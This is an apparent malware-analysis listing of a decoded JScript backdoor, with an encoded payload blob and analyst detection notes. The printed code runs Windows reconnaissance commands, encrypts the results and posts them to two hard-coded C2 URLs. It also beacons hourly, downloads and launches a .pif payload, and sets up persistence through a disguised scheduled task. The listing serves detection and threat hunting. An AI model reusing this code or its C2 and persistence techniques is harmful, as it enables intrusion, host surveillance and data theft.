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";
  191.     return qGxZ;
  192. }
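  193. ## ---- decoded eval: the script text that maintools.js passes to eval() after base64-decoding and RC4-decrypting its embedded string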
  // Reads the file at path zDmy as text using code page 437 and returns cz_b() of that text.
  // cz_b is not defined in the part of the script shown here; presumably it converts the
  // code-page-437 characters back to raw byte values (see the b92A table) - confirm against the full sample.
  194. function UspD(zDmy) {
  195.     var m3mH = WScript.CreateObject("ADODB.Stream")
  // Stream type 2 is text mode.
  196.     m3mH.Type = 2;
  197.     m3mH.CharSet = '437';
  198.    m3mH.Open();
  199.     m3mH.LoadFromFile(zDmy);
  200.     var c0xi = m3mH.ReadText;
  201.     m3mH.Close();
  202.     return cz_b(c0xi);
  203. }
  // Configuration and global state of the decoded backdoor.
  // CKpR: the two URLs the script posts to. Both are PHP files under WordPress plugin
  // directories, which suggests compromised third-party sites (not verifiable from this page).
  // They are network indicators for this sample.
  204. var CKpR = new Array("http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php", "http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php");
  // tpO8: fixed string mixed into the identifier that Sz8k() appends to the User-Agent header.
  205. var tpO8 = "w3LxnRSbJcqf8HrU";
  // auME: host and network discovery commands. Each entry ends with a redirection operator;
  // Fv6b() appends a file path and runs the command through cmd.exe.
  // Detection note: this burst of built-in commands launched in sequence from a script host
  // is a strong behavioural signal.
  206. var auME = new Array("systeminfo > ", "net view >> ", "net view /domain >> ", "tasklist /v >> ", "gpresult /z >> ", "netstat -nao >> ", "ipconfig /all >> ", "arp -a >> ", "net share >> ", "net use >> ", "net user >> ", "net user administrator >> ", "net user /domain >> ", "net user administrator /domain >> ", "set  >> ", "dir %systemdrive%\x5cUsers\x5c*.* >> ", "dir %userprofile%\x5cAppData\x5cRoaming\x5cMicrosoft\x5cWindows\x5cRecent\x5c*.* >> ", "dir %userprofile%\x5cDesktop\x5c*.* >> ", "tasklist /fi \x22modules eq wow64.dll\x22  >> ", "tasklist /fi \x22modules ne wow64.dll\x22 >> ", "dir \x22%programfiles(x86)%\x22 >> ", "dir \x22%programfiles%\x22 >> ", "dir %appdata% >>");
  // File-system helper object used for copy and delete operations.
  207. var QUjy = new ActiveXObject("Scripting.FileSystemObject");
  // File name of the running script.
  208. var LIxF = WScript.ScriptName;
  // Current user name; filled in by TfOh().
  209. var w5mY = "";
  // Random name from TfOh(); the call also sets w5mY as a side effect.
  210. var ruGx = TfOh();
  211.  
  // Base64 encoder working on a bit string.
  // XngP: input string. y1qa: when truthy each character contributes 8 bits and the output is
  // padded with '=' to a multiple of 4; otherwise each character contributes 16 bits and the
  // output is padded to a multiple of 8.
  // char_set is assigned without var (so it becomes a global) and read back as this.char_set.
  212. function hLit(XngP, y1qa) {
  213.     char_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  214.     var Rj3c = "";
  215.     var OKpB = "";
  216.     for (var i = 0; i < XngP.length; ++i) {
  217.         var B8wU = XngP.charCodeAt(i);
  // Binary representation of the character code, left-padded with zeros.
  218.         var LUxg = B8wU.toString(2);
  219.         while (LUxg.length < (y1qa ? 8 : 16))
  220.             LUxg = "0" + LUxg;
  221.         OKpB += LUxg;
  // Emit one output character for every complete group of 6 bits.
  222.         while (OKpB.length >= 6) {
  223.             var vjUu = OKpB.slice(0, 6);
  224.             OKpB = OKpB.slice(6);
  225.             Rj3c += this.char_set.charAt(parseInt(vjUu, 2));
  226.         }
  227.     }
  // Leftover bits are right-padded with zeros to a final 6-bit group.
  228.     if (OKpB) {
  229.         while (OKpB.length < 6) OKpB += "0";
  230.         Rj3c += this.char_set.charAt(parseInt(OKpB, 2));
  231.     }
  232.     while (Rj3c.length % (y1qa ? 4 : 8) != 0)
  233.         Rj3c += "=";
  234.     return Rj3c;
  235. }
  // Lookup table from Unicode code point (upper-case hex, no zero padding) to the matching
  // code page 437 byte value (hex) for the range 0x80-0xFF.
  // The table is not referenced in the part of the script shown here; presumably cz_b() uses it
  // to turn text read with CharSet "437" back into raw bytes - confirm against the full sample.
  236. var b92A = [];
  // 0x80-0xAF: accented Latin letters, currency signs, punctuation and fractions.
  237. b92A['C7'] = '80';
  238. b92A['FC'] = '81';
  239. b92A['E9'] = '82';
  240. b92A['E2'] = '83';
  241. b92A['E4'] = '84';
  242. b92A['E0'] = '85';
  243. b92A['E5'] = '86';
  244. b92A['E7'] = '87';
  245. b92A['EA'] = '88';
  246. b92A['EB'] = '89';
  247. b92A['E8'] = '8A';
  248. b92A['EF'] = '8B';
  249. b92A['EE'] = '8C';
  250. b92A['EC'] = '8D';
  251. b92A['C4'] = '8E';
  252. b92A['C5'] = '8F';
  253. b92A['C9'] = '90';
  254. b92A['E6'] = '91';
  255. b92A['C6'] = '92';
  256. b92A['F4'] = '93';
  257. b92A['F6'] = '94';
  258. b92A['F2'] = '95';
  259. b92A['FB'] = '96';
  260. b92A['F9'] = '97';
  261. b92A['FF'] = '98';
  262. b92A['D6'] = '99';
  263. b92A['DC'] = '9A';
  264. b92A['A2'] = '9B';
  265. b92A['A3'] = '9C';
  266. b92A['A5'] = '9D';
  267. b92A['20A7'] = '9E';
  268. b92A['192'] = '9F';
  269. b92A['E1'] = 'A0';
  270. b92A['ED'] = 'A1';
  271. b92A['F3'] = 'A2';
  272. b92A['FA'] = 'A3';
  273. b92A['F1'] = 'A4';
  274. b92A['D1'] = 'A5';
  275. b92A['AA'] = 'A6';
  276. b92A['BA'] = 'A7';
  277. b92A['BF'] = 'A8';
  278. b92A['2310'] = 'A9';
  279. b92A['AC'] = 'AA';
  280. b92A['BD'] = 'AB';
  281. b92A['BC'] = 'AC';
  282. b92A['A1'] = 'AD';
  283. b92A['AB'] = 'AE';
  284. b92A['BB'] = 'AF';
  // 0xB0-0xDF: shading, box-drawing and block characters.
  285. b92A['2591'] = 'B0';
  286. b92A['2592'] = 'B1';
  287. b92A['2593'] = 'B2';
  288. b92A['2502'] = 'B3';
  289. b92A['2524'] = 'B4';
  290. b92A['2561'] = 'B5';
  291. b92A['2562'] = 'B6';
  292. b92A['2556'] = 'B7';
  293. b92A['2555'] = 'B8';
  294. b92A['2563'] = 'B9';
  295. b92A['2551'] = 'BA';
  296. b92A['2557'] = 'BB';
  297. b92A['255D'] = 'BC';
  298. b92A['255C'] = 'BD';
  299. b92A['255B'] = 'BE';
  300. b92A['2510'] = 'BF';
  301. b92A['2514'] = 'C0';
  302. b92A['2534'] = 'C1';
  303. b92A['252C'] = 'C2';
  304. b92A['251C'] = 'C3';
  305. b92A['2500'] = 'C4';
  306. b92A['253C'] = 'C5';
  307. b92A['255E'] = 'C6';
  308. b92A['255F'] = 'C7';
  309. b92A['255A'] = 'C8';
  310. b92A['2554'] = 'C9';
  311. b92A['2569'] = 'CA';
  312. b92A['2566'] = 'CB';
  313. b92A['2560'] = 'CC';
  314. b92A['2550'] = 'CD';
  315. b92A['256C'] = 'CE';
  316. b92A['2567'] = 'CF';
  317. b92A['2568'] = 'D0';
  318. b92A['2564'] = 'D1';
  319. b92A['2565'] = 'D2';
  320. b92A['2559'] = 'D3';
  321. b92A['2558'] = 'D4';
  322. b92A['2552'] = 'D5';
  323. b92A['2553'] = 'D6';
  324. b92A['256B'] = 'D7';
  325. b92A['256A'] = 'D8';
  326. b92A['2518'] = 'D9';
  327. b92A['250C'] = 'DA';
  328. b92A['2588'] = 'DB';
  329. b92A['2584'] = 'DC';
  330. b92A['258C'] = 'DD';
  331. b92A['2590'] = 'DE';
  332. b92A['2580'] = 'DF';
  // 0xE0-0xFF: Greek letters and mathematical symbols.
  333. b92A['3B1'] = 'E0';
  334. b92A['DF'] = 'E1';
  335. b92A['393'] = 'E2';
  336. b92A['3C0'] = 'E3';
  337. b92A['3A3'] = 'E4';
  338. b92A['3C3'] = 'E5';
  339. b92A['B5'] = 'E6';
  340. b92A['3C4'] = 'E7';
  341. b92A['3A6'] = 'E8';
  342. b92A['398'] = 'E9';
  343. b92A['3A9'] = 'EA';
  344. b92A['3B4'] = 'EB';
  345. b92A['221E'] = 'EC';
  346. b92A['3C6'] = 'ED';
  347. b92A['3B5'] = 'EE';
  348. b92A['2229'] = 'EF';
  349. b92A['2261'] = 'F0';
  350. b92A['B1'] = 'F1';
  351. b92A['2265'] = 'F2';
  352. b92A['2264'] = 'F3';
  353. b92A['2320'] = 'F4';
  354. b92A['2321'] = 'F5';
  355. b92A['F7'] = 'F6';
  356. b92A['2248'] = 'F7';
  357. b92A['B0'] = 'F8';
  358. b92A['2219'] = 'F9';
  359. b92A['B7'] = 'FA';
  360. b92A['221A'] = 'FB';
  361. b92A['207F'] = 'FC';
  362. b92A['B2'] = 'FD';
  363. b92A['25A0'] = 'FE';
  364. b92A['A0'] = 'FF';
  365.  
  // Builds and returns a random name: one upper-case letter followed by a random run of digits
  // and upper- or lower-case letters.
  // Side effect: stores the current user name (from WScript.Network) in the global w5mY.
  // Callers elsewhere in the visible script discard the return value, so that side effect is
  // the part the rest of the code relies on.
  366. function TfOh() {
  // Number of extra characters to append.
  367.     var ayuh = Math.ceil(Math.random() * 10 + 25);
  368.     var name = String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  369.     var dc9V = WScript.CreateObject("WScript.Network");
  370.     w5mY = dc9V.UserName;
  371.     for (var count = 0; count < ayuh; count++) {
  // Pick a digit, a lower-case letter or an upper-case letter at random.
  372.         switch (Math.ceil(Math.random() * 3)) {
  373.             case 1:
  374.                 name = name + Math.ceil(Math.random() * 8);
  375.                 break;
  376.             case 2:
  377.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 97));
  378.                 break;
  379.             default:
  380.                 name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
  381.                 break;
  382.         }
  383.     }
  384.     return name;
  385. }
  // Entry point of the decoded backdoor.
  // wyKN is used below as a path prefix for every file the script creates; Blgx() is not
  // defined in the part of the script shown here, so how the prefix is chosen cannot be
  // confirmed from this page.
  386. var wyKN = Blgx(bIdG());
  387. try {
  // WE86: WScript.Shell object used to run the discovery commands.
  388.     var WE86 = bIdG();
  // Install step, then the beacon loop (which does not return).
  389.     rGcR();
  390.     jSm8();
  391. } catch (e) {
  // Any error ends the script without a visible message.
  392.     WScript.Quit();
  393. }
  394.  
  // Main beacon loop. Collects host information once with Fv6b(), then repeatedly posts it to
  // each configured URL and acts on the text of the reply:
  //   "good" - nothing to do
  //   "exit" - stop the script
  //   "work" - fetch and handle a file from the same URL (XBL3)
  //   "fail" - clean-up routine (tbMu), which also stops the script
  // Between rounds the script sleeps 3600 to 3900 seconds.
  // Detection note: this gives an outbound POST to each URL roughly once an hour with a few
  // minutes of jitter, originating from a script host process.
  395. function jSm8() {
  396.     var c9lr = Fv6b();
  397.     while (true) {
  398.         for (var i = 0; i < CKpR.length; i++) {
  399.             var Ysyo = CKpR[i];
  400.             var f3cb = XEWG(Ysyo, c9lr);
  401.             switch (f3cb) {
  402.                 case "good":
  403.                     break;
  404.                 case "exit":
  405.                     WScript.Quit();
  406.                     break;
  407.                 case "work":
  408.                     XBL3(Ysyo);
  409.                     break;
  410.                 case "fail":
  411.                     tbMu();
  412.                     break;
  413.                 default:
  414.                     break;
  415.             }
  // Return value is discarded; the call refreshes the global user name.
  416.             TfOh();
  417.         }
  418.         WScript.Sleep((Math.random() * 300 + 3600) * 1000);
  419.     }
  420. }
  421.  
  // Returns a new WScript.Shell object.
  // Both names are written with Unicode escapes: the first literal decodes to "ActiveXObject"
  // and the second to "WScript.Shell". The constructor is looked up as a property of `this`.
  // Analyst note: the escapes keep the plain strings out of the script text, so signatures for
  // this stage need to match the escaped form or the decoded behaviour rather than the names.
  422. function bIdG() {
  423.     var spq3 = this['\u0041\u0063\u0074i\u0076eX\u004F\u0062j\u0065c\u0074'];
  424.    var zBVv = new spq3('\u0057\u0053cr\u0069\u0070\u0074\u002E\u0053he\u006C\u006C');
  425.    return zBVv;
  426. }
  427.  
  // Handles the "work" reply: requests a file from the URL B_TG and passes it to helper routines.
  // The target path is the path prefix plus the script's own name with its last two characters
  // replaced by "pif" (for maintools.js that is maintools.pif).
  // The response body is read as code page 437 text, passed through cz_b() and FXx9() with a
  // fixed key string, and handed to NoRS() together with the target path; c5ae() is then called
  // with the path and URL, and the file is deleted after 30 seconds.
  // cz_b, FXx9, NoRS and c5ae are not defined in the part of the script shown here; presumably
  // they decode, decrypt, write and launch the file - confirm against the full sample.
  // Detection note: a short-lived .pif file created next to the script is the host artefact.
  428. function XBL3(B_TG) {
  429.     var YIme = wyKN + LIxF.substring(0, LIxF.length - 2) + "pif";
  430.     var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
  // Synchronous POST with the literal body "work".
  431.     Kpxo.OPEN("post", B_TG, false);
  432.     Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
  433.     Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
  434.     Kpxo.SETREQUESTHEADER("content-length:", "4");
  435.     Kpxo.SEND("work");
  // Remove any file left over from an earlier run.
  436.     if (QUjy.FILEEXISTS(YIme)) {
  437.         QUjy.DELETEFILE(YIme);
  438.     }
  439.     if (Kpxo.STATUS == 200) {
  // Load the binary response into a stream, then re-read it as code page 437 text.
  440.         var m3mH = new ActiveXObject("ADODB.STREAM");
  441.         m3mH.TYPE = 1;
  442.         m3mH.OPEN();
  443.         m3mH.WRITE(Kpxo.responseBody);
  444.         m3mH.Position = 0;
  445.         m3mH.Type = 2;
  446.         m3mH.CharSet = "437";
  447.         var c0xi = m3mH.ReadText(m3mH.Size);
  // Same fixed key string as the one used for the outbound data in Fv6b().
  448.         var ptF0 = FXx9("2f532d6baec3d0ec7b1f98aed4774843", cz_b(c0xi));
  449.         NoRS(ptF0, YIme);
  450.         m3mH.Close();
  451.     }
  452.     var ruGx = TfOh();
  453.     c5ae(YIme, B_TG);
  454.     WScript.Sleep(30000);
  455.     QUjy.DELETEFILE(YIme);
  456. }
  457.  
  // Handles the "fail" reply: deletes the running script file, calls eV_C() with the same
  // arguments rGcR() uses except for a final false instead of true, calls KhDn("TaskManager"),
  // and stops the script.
  // eV_C and KhDn are not defined in the part of the script shown here; the "TaskManager" /
  // "Windows Task Manager" names suggest a named autostart entry that is being removed here -
  // confirm against the full sample. v_FileName is the global set in rGcR().
  458. function tbMu() {
  459.     QUjy.DELETEFILE(WScript.SCRIPTFULLNAME);
  460.     eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, false);
  461.     KhDn("TaskManager");
  462.     WScript.Quit();
  463. }
  464.  
  465. function XEWG(uXHK, hm2j) {
           // Analyst note: generic check-in routine. POSTs hm2j to the URL uXHK and
           // returns the server's reply as text.
           // The body is first passed through hLit(hm2j, true), which is defined
           // outside this excerpt (presumably an encoding step; confirm there).
           // Uses the same fixed User-Agent prefix plus Sz8k() host ID as XBL3.
           // Every exception is swallowed and "" is returned, so a blocked or failed
           // connection produces no script-level error.
  466.     try {
  467.         var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
  468.         Kpxo.OPEN("post", uXHK, false);
  469.         Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
  470.         Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
  471.         var rRi3 = hLit(hm2j, true);
  472.         Kpxo.SETREQUESTHEADER("content-length:", rRi3.length);
  473.         Kpxo.SEND(rRi3);
  474.         return Kpxo.responseText;
  475.     } catch (e) {
  476.         return "";
  477.     }
  478. }
  479.  
  480. function Sz8k() {
           // Analyst note: builds the per-host identifier appended to the User-Agent.
           // Input string = tpO8 + computer name + w5mY. tpO8 is defined outside this
           // excerpt; w5mY is used elsewhere in the file as the user name in profile
           // paths and as the scheduled-task principal.
           // For each i in 0..15 the character codes from index i up to, but not
           // including, the last character are XORed together and reduced mod 10,
           // giving one decimal digit. The result is 16 digits followed by tpO8.
           // The value is deterministic per host, so the same suffix recurs in every
           // request from one machine.
  481.     var n9mV = "";
  482.     var dc9V = WScript.CreateObject("WScript.Network");
  483.     var rRi3 = tpO8 + dc9V.ComputerName + w5mY;
  484.     for (var i = 0; i < 16; i++) {
  485.         var YsXA = 0
  486.         for (var j = i; j < rRi3.length - 1; j++) {
  487.             YsXA = YsXA ^ rRi3.charCodeAt(j);
  488.         }
  489.         YsXA = (YsXA % 10);
  490.         n9mV = n9mV + YsXA.toString(10);
  491.     }
  492.     n9mV = n9mV + tpO8;
  493.     return n9mV;
  494. }
  495.  
  496. function rGcR() {
           // Analyst note: persistence installer.
           // Sets the global v_FileName to wyKN + LIxF with its last two characters
           // replaced by "js", and copies the running script to wyKN + LIxF. Whether
           // the two paths coincide depends on LIxF, which is defined outside this
           // excerpt.
           // Waits a random 350-500 seconds, then registers a hidden scheduled task
           // through eV_C(). Hunting pivots: task name "TaskManager", description
           // "Windows Task Manager", action argument "EzZETcSXyKAdF_e5I2i1", and the
           // task folder "WPD" that eV_C() uses.
  497.     v_FileName = wyKN + LIxF.substring(0, LIxF.length - 2) + "js";
  498.     QUjy.COPYFILE(WScript.ScriptFullName, wyKN + LIxF);
  499.     var HFp7 = (Math.random() * 150 + 350) * 1000;
  500.     WScript.Sleep(HFp7);
  501.     eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, true);
  502. }
  503.  
  504. function Fv6b() {
           // Analyst note: host-survey routine. Runs every entry of auME (defined
           // outside this excerpt) as "cmd.exe /c <entry>" with the quoted path of
           // wyKN + "~dat.tmp" appended directly. Presumably each entry ends in an
           // output redirection; confirm against the auME definition.
           // Run(..., 0, true) hides the window and waits for each command to finish.
           // The collected file is read with UspD() (defined elsewhere), deleted after
           // one second, and its content is returned RC4-encrypted with the same
           // hard-coded key used in XBL3.
           // Detection: a script host spawning cmd.exe with "~dat.tmp" in the command
           // line.
  505.     var m_Rr = wyKN + "~dat.tmp";
  506.     for (var i = 0; i < auME.length; i++) {
  507.         WE86.Run("cmd.exe /c " + auME[i] + "\x22" + m_Rr + "\x22", 0, true);
  508.     }
  509.     var nRVN = UspD(m_Rr);
  510.     WScript.Sleep(1000);
  511.     QUjy.DELETEFILE(m_Rr);
  512.     return FXx9("2f532d6baec3d0ec7b1f98aed4774843", nRVN);
  513. }
  514.  
  515. function c5ae(YIme, B_TG) {
           // Analyst note: launches the file at YIme (quoted) through WE86.Run if it
